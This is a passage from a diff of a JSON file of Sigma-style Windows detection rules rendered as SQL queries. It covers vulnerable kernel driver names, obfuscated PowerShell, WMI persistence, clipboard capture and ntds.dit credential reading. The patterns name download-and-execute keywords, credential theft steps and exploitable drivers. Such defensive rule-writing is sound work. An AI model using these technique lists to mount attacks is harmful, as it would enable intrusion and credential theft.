ImageLoaded LIKE '%\\\\eneio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\capcom.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\80.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asio32.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iobitunlocker.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\zamguard64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nstrwsk.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wiseunlo.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\t7.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bs\\_hwmio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hostnt.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\glckio2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hpportiox64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\citmdrv\\_amd64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\kevp64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bsmixp64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nbiolib\\_x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\full.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nvflash.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtcore64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\speedfan.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fidpcidrv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hwrwdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msrhook.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proxy64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\7.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winring0.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hw\\_sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winio64b.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\semav6msr64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bandai.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\piddrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\t8.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrdrv103.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\adv64drv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrsetupdrv103.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bwrs.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d4.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbk64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fiddrv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\goad.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gametersafe.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mhyprot2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lenovodiagnosticsdriver.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netflt.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bw.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntbios\\_2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbutil.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dh\\_kernel.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtkiow8x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\daxin\\_blank.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\superbmc.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nodedriver.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cpuz141.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gftkyj64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\4.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dh\\_kernel\\_10.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\naldrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winiodrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asmmap64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\smep\\_namco.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mhyprot.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iqvw64e.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nstr.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntiolib.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pciecubed.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vmdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\daxin\\_blank2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\atszio.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\agent64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cpupress.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\driver7-x86.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\krpocesshacker.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrdrv102.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aswvmm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tmcomm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bs\\_def.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bsmi.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\alsysio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cpuz.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\daxin\\_blank1.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amifldrv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rwdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\testbone.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winio64c.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winring0x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nt4.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\procexp.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\se64a.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\air\\_system10.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wantd.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wcpu.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nicm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\daxin\\_blank6.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\kbdcap64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lctka.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nvflsh64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\phlashnt.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\viragt.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\atszio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbutil\\_2\\_3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\phymemx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wantd\\_4.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ndislan.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\panmonfltx64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\t3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\panmonflt.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\daxin\\_blank3.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\smep\\_capcom.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wyproxy32.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\black.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vboxdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cpuz\\_x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\poortry.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mydrivers.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winio64a.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\openlibsys.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bs\\_flash64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vproeventmonitor.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\piddrv64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wantd\\_2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sysinfo.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrdrv104.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netfilterdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\libnicm.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\driver7-x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\semav6msr.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pchunter.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asupio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtkio64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rzpnk.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\magdrvamd64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\elrawdsk.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amp.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrautochkupddrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lgdcatcher.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fairplaykd.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\daxin\\_blank4.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtkiow10x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\citmdrv\\_ia64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nt5.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asromgdrv.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nt2.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\asrdrv101.sys' ESCAPE '\\'))" ], - "filename": "win_system_invoke_obfuscation_stdin_services.yml" + "filename": "driver_load_win_vuln_drivers_names.yml" }, { - "title": "NTLMv1 Logon Between Client and Server", - "id": "e9d4ab66-a532-4ef7-a502-66a9e4a34f5d", + "title": "Suspicious Scripting in a WMI Consumer", + "id": "fe21810c-2a8c-478f-8dd3-5a287fb2a0e0", "status": "experimental", - "description": "Detects the reporting of NTLMv1 being used between a client and server", - "author": "Tim Shelton", + "description": "Detects suspicious commands that are related to scripting/powershell in WMI Event Consumers", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", "tags": [ "attack.execution", - "attack.t1550.002", - "attack.s0363" + "attack.t1059.005" ], "falsepositives": [ - "Environments that use NTLMv1" + "Legitimate administrative scripts" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'LsaSrv' AND EventID = '6038')" + "SELECT * FROM logs WHERE ((EventID IN ('19', '20', '21') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Destination LIKE '%new-object%' ESCAPE '\\' AND Destination LIKE '%net.webclient%' ESCAPE '\\' AND Destination LIKE '%.downloadstring%' ESCAPE '\\') OR (Destination LIKE '%new-object%' ESCAPE '\\' AND Destination LIKE '%net.webclient%' ESCAPE '\\' AND Destination LIKE '%.downloadfile%' ESCAPE '\\') OR (Destination LIKE '% iex(%' ESCAPE '\\' OR Destination LIKE '%WScript.shell%' ESCAPE '\\' OR Destination LIKE '% -nop %' ESCAPE '\\' OR Destination LIKE '% -noprofile %' ESCAPE '\\' OR Destination LIKE '% -decode %' ESCAPE '\\' OR Destination LIKE '% -enc %' ESCAPE '\\') OR (Destination LIKE '%WScript.Shell%' ESCAPE '\\' OR Destination LIKE '%System.Security.Cryptography.FromBase64Transform%' ESCAPE '\\')))" ], - "filename": "win_system_lsasrv_ntlmv1.yml" + "filename": "sysmon_wmi_susp_scripting.yml" }, { - "title": "smbexec.py Service Installation", - "id": "52a85084-6989-40c3-8f32-091e12e13f09", + "title": "WMI Event Subscription", + "id": "0f06a3a5-6a09-413f-8743-e6cf35561297", "status": "test", - "description": "Detects the use of smbexec.py tool by detecting a specific service installation", - "author": "Omer Faruk Celik", + "description": "Detects creation of WMI event subscription persistence method", + "author": "Tom Ueltschi (@c_APT_ure)", "tags": [ - "attack.lateral_movement", - "attack.execution", - "attack.t1021.002", - "attack.t1569.002" + "attack.persistence", + "attack.t1546.003" ], "falsepositives": [ - "Unknown" + "Exclude legitimate (vetted) use of WMI event subscription in your network" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'BTOBTO' AND ImagePath LIKE '%\\\\execute.bat' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('19', '20', '21') AND Channel = 'Microsoft-Windows-Sysmon/Operational')" ], - "filename": "win_system_hack_smbexec.yml" + "filename": "sysmon_wmi_event_subscription.yml" }, { - "title": "Invoke-Obfuscation RUNDLL LAUNCHER - System", - "id": "11b52f18-aaec-4d60-9143-5dd8cc4706b9", - "status": "experimental", - "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "title": "PowerShell Decompress Commands", + "id": "1ddc1472-8e52-4f7d-9f11-eab14fc171f5", + "status": "test", + "description": "A General detection for specific decompress commands in PowerShell logs. This could be an adversary decompressing files.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1140" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "informational", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%rundll32.exe%' ESCAPE '\\' AND ImagePath LIKE '%shell32.dll%' ESCAPE '\\' AND ImagePath LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%Expand-Archive%' ESCAPE '\\')" ], - "filename": "win_system_invoke_obfuscation_via_rundll_services.yml" + "filename": "posh_pm_decompress_commands.yml" }, { - "title": "Windows Update Error", - "id": "13cfeb75-9e33-4d04-b0f7-ab8faaa95a59", - "status": "test", - "description": "Windows Update get some error Check if need a 0-days KB", - "author": "frack113", + "title": "SyncAppvPublishingServer Bypass Powershell Restriction - PS Module", + "id": "fe5ce7eb-dad8-467c-84a9-31ec23bd644a", + "status": "experimental", + "description": "Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.", + "author": "Ensar Şamil, @sblmsrsn, OSCD Community", "tags": [ - "attack.impact", - "attack.resource_development", - "attack.t1584" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "App-V clients" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Microsoft-Windows-WindowsUpdateClient' AND EventID IN ('16', '20', '24', '213', '217'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%SyncAppvPublishingServer.exe%' ESCAPE '\\')" ], - "filename": "win_system_susp_system_update_error.yml" + "filename": "posh_pm_syncappvpublishingserver_exe.yml" }, { - "title": "OilRig APT Schedule Task Persistence - System", - "id": "53ba33fd-3a50-4468-a5ef-c583635cfa92", + "title": "Clear PowerShell History - PowerShell Module", + "id": "f99276ad-d122-4989-a09a-d00904a5f9d2", "status": "experimental", - "description": "Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "description": "Detects keywords that could indicate clearing PowerShell history", + "author": "Ilyas Ochkov, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", "attack.defense_evasion", - "attack.t1112", - "attack.command_and_control", - "attack.t1071.004" + "attack.t1070.003" ], "falsepositives": [ - "Unlikely" + "Legitimate PowerShell scripts" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName IN ('SC Scheduled Scan', 'UpdatMachine'))" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (((Payload LIKE '%Set-PSReadlineOption%' ESCAPE '\\' AND Payload LIKE '%–HistorySaveStyle%' ESCAPE '\\' AND Payload LIKE '%SaveNothing%' ESCAPE '\\') OR (Payload LIKE '%Set-PSReadlineOption%' ESCAPE '\\' AND Payload LIKE '%-HistorySaveStyle%' ESCAPE '\\' AND Payload LIKE '%SaveNothing%' ESCAPE '\\')) OR ((Payload LIKE '%del%' ESCAPE '\\' OR Payload LIKE '%Remove-Item%' ESCAPE '\\' OR Payload LIKE '%rm%' ESCAPE '\\') AND Payload LIKE '%(Get-PSReadlineOption).HistorySavePath%' ESCAPE '\\')))" ], - "filename": "win_system_apt_oilrig_mar18.yml" + "filename": "posh_pm_clear_powershell_history.yml" }, { - "title": "Remote Utilities Host Service Install", - "id": "85cce894-dd8b-4427-a958-5cc47a4dc9b9", - "status": "experimental", - "description": "Detects Remote Utilities Host service installation on the target system.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Computer Machine Password by PowerShell", + "id": "e3818659-5016-4811-a73c-dde4679169d2", + "status": "test", + "description": "The Reset-ComputerMachinePassword cmdlet changes the computer account password that the computers use to authenticate to the domain controllers in the domain.\nYou can use it to reset the password of the local computer.\n", + "author": "frack113", "tags": [ - "attack.persistence" + "attack.initial_access", + "attack.t1078" ], "falsepositives": [ - "Legitimate use of the tool" + "Administrator PowerShell scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%\\\\rutserv.exe%' ESCAPE '\\' AND ImagePath LIKE '%-service%' ESCAPE '\\') OR ServiceName = 'Remote Utilities - Host'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%Reset-ComputerMachinePassword%' ESCAPE '\\')" ], - "filename": "win_system_service_install_remote_utilities.yml" + "filename": "posh_pm_susp_reset_computermachinepassword.yml" }, { - "title": "TacticalRMM Service Installation", - "id": "4bb79b62-ef12-4861-981d-2aab43fab642", - "status": "experimental", - "description": "Detects a TacticalRMM service installation. Tactical RMM is a remote monitoring & management tool.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Get-ADDBAccount Usage", + "id": "b140afd9-474b-4072-958e-2ebb435abd68", + "status": "test", + "description": "Detects suspicious invocation of the Get-ADDBAccount script that reads from a ntds.dit file and may be used to get access to credentials without using any credential dumpers", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.credential_access", + "attack.t1003.003" ], "falsepositives": [ - "Legitimate use of the tool" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%tacticalrmm.exe%' ESCAPE '\\' OR ServiceName LIKE '%TacticalRMM Agent Service%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%Get-ADDBAccount%' ESCAPE '\\' AND Payload LIKE '%BootKey %' ESCAPE '\\' AND Payload LIKE '%DatabasePath %' ESCAPE '\\')" ], - "filename": "win_system_service_install_tacticalrmm.yml" + "filename": "posh_pm_get_addbaccount.yml" }, { - "title": "Invoke-Obfuscation COMPRESS OBFUSCATION - System", - "id": "175997c5-803c-4b08-8bb0-70b099f47595", + "title": "PowerShell Get Clipboard", + "id": "4cbd4f12-2e22-43e3-882f-bff3247ffb78", "status": "experimental", - "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", - "author": "Timur Zinniatullin, oscd.community", + "description": "A General detection for the Get-Clipboard commands in PowerShell logs. This could be an adversary capturing clipboard contents.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.collection", + "attack.t1115" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%new-object%' ESCAPE '\\' AND ImagePath LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND ImagePath LIKE '%readtoend%' ESCAPE '\\' AND (ImagePath LIKE '%:system.io.compression.deflatestream%' ESCAPE '\\' OR ImagePath LIKE '%system.io.streamreader%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%Get-Clipboard%' ESCAPE '\\')" ], - "filename": "win_system_invoke_obfuscation_via_compress_services.yml" + "filename": "posh_pm_get_clipboard.yml" }, { - "title": "KDC RC4-HMAC Downgrade CVE-2022-37966", - "id": "e6f81941-b1cd-4766-87db-9fc156f658ee", + "title": "Invoke-Obfuscation CLIP+ Launcher - PowerShell Module", + "id": "a136cde0-61ad-4a61-9b82-8dc490e60dd2", "status": "experimental", - "description": "Detects the exploitation of a security bypass and elevation of privilege vulnerability with Authentication Negotiation by using weak RC4-HMAC negotiation", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '42' AND Provider_Name = 'Kerberos-Key-Distribution-Center' AND Level = '2')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r).+clip(?:\\.exe)?.{0,4}&&.+clipboard]::\\(\\s\\\\\"\\{\\d\\}.+-f.+\"')" ], - "filename": "win_system_kdcsvc_rc4_downgrade.yml" + "filename": "posh_pm_invoke_obfuscation_clip.yml" }, { - "title": "Suspicious Usage of CVE_2021_34484 or CVE 2022_21919", - "id": "52a85084-6989-40c3-8f32-091e12e17692", + "title": "Use Get-NetTCPConnection - PowerShell Module", + "id": "aff815cc-e400-4bf0-a47a-5d8a2407d4e1", "status": "experimental", - "description": "During exploitation of this vuln, two logs (providername:Microsoft-Windows-User Profiles Service) with eventid 1511 and 1515 (maybe lot of false positives with this event) are created. Moreover, it appears the directory \\Users\\TEMP is created may be created during the exploitation.Viewed on 2008 Server", - "author": "Cybex", + "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.", + "author": "frack113", "tags": [ - "attack.execution" + "attack.discovery", + "attack.t1049" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND EventID = '1511' AND Provider_Name = 'Microsoft-Windows-User Profiles Service')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%Get-NetTCPConnection%' ESCAPE '\\')" ], - "filename": "win_system_susp_vuln_cve_2022_21919_or_cve_2021_34484.yml" + "filename": "posh_pm_susp_get_nettcpconnection.yml" }, { - "title": "PowerShell Scripts Installed as Services", - "id": "a2e5019d-a658-4c6a-92bf-7197b54e2cae", - "status": "test", - "description": "Detects powershell script installed as a Service", - "author": "oscd.community, Natalia Shornikova", + "title": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module", + "id": "2f211361-7dce-442d-b78a-c04039677378", + "status": "experimental", + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block cited in the reference section below", + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", "tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.t1569.002" + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%powershell%' ESCAPE '\\' OR ImagePath LIKE '%pwsh%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (Payload REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR Payload REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR Payload REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR Payload REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR Payload REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR Payload REGEXP '\\$VerbosePreference\\.ToString\\(' OR Payload REGEXP '\\[String\\]\\s*\\$VerbosePreference'))" ], - "filename": "win_system_powershell_script_installed_as_service.yml" + "filename": "posh_pm_invoke_obfuscation_obfuscated_iex.yml" }, { - "title": "Turla PNG Dropper Service", - "id": "1228f8e2-7e79-4dea-b0ad-c91f1d5016c1", - "status": "test", - "description": "This method detects malicious services mentioned in Turla PNG dropper report by NCC Group in November 2018", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Active Directory Enumeration Using AD Module - PsModule", + "id": "74176142-4684-4d8a-8b0a-713257e7df8e", + "status": "experimental", + "description": "Detects usage of the \"Import-Module\" cmdlet to load the \"Microsoft.ActiveDirectory.Management.dl\" DLL. Which is often used by attackers to perform AD enumeration.", + "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "tags": [ - "attack.persistence", - "attack.g0010", - "attack.t1543.003" + "attack.reconnaissance", + "attack.discovery", + "attack.impact" ], "falsepositives": [ - "Unlikely" + "Legitimate use of the library for administrative activity" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'WerFaultSvc')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%Import-Module %' ESCAPE '\\' OR Payload LIKE '%ipmo %' ESCAPE '\\') AND Payload LIKE '%Microsoft.ActiveDirectory.Management.dll%' ESCAPE '\\')" ], - "filename": "win_system_apt_turla_service_png.yml" + "filename": "posh_pm_active_directory_module_dll_import.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA - System", - "id": "7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4", + "title": "Invoke-Obfuscation Via Use MSHTA - PowerShell Module", + "id": "07ad2ea8-6a55-4ac6-bf3e-91b8e59676eb", "status": "experimental", "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", "author": "Nikita Nazarov, oscd.community", @@ -4634,1522 +4197,1490 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%mshta%' ESCAPE '\\' AND ImagePath LIKE '%vbscript:createobject%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%set%' ESCAPE '\\' AND Payload LIKE '%&&%' ESCAPE '\\' AND Payload LIKE '%mshta%' 